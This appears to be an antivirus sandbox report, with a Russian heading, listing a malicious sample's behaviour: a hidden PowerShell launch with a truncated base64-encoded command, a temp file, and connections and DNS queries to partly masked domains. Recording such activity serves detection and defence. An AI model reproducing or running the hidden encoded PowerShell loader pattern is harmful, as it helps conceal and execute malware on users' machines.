Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABDAHoAeABzAGUAaQBxAG0AYwBpAGsAYQA9ACcAWgBhAGcAeABuAHMAdQBjAG8AJwA7ACQARAByAHgAYQBrAGkAZABrAGEAYQB6AHcAcAAgAD0AIAAnADgANgA5ACcAOwAkAFUAawBkAG0AdQBzAHMAeQBtAHI...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1484
- %TEMP%\1180989.cvr
- 'st#####dshoppers.com':443
- 've###express.ma':443
- 'pk#.goog':80
- 'la####muestra.org':443
- 'cd#.life':443
- http://pk#.goog/gsr1/gsr1.crt
- 'st#####dshoppers.com':443
- 've###express.ma':443
- 'la####muestra.org':443
- 'cd#.life':443
- DNS ASK st#####dshoppers.com
- DNS ASK ve###express.ma
- DNS ASK pk#.goog
- DNS ASK la####muestra.org
- DNS ASK fr###pbx.com
- DNS ASK cd#.life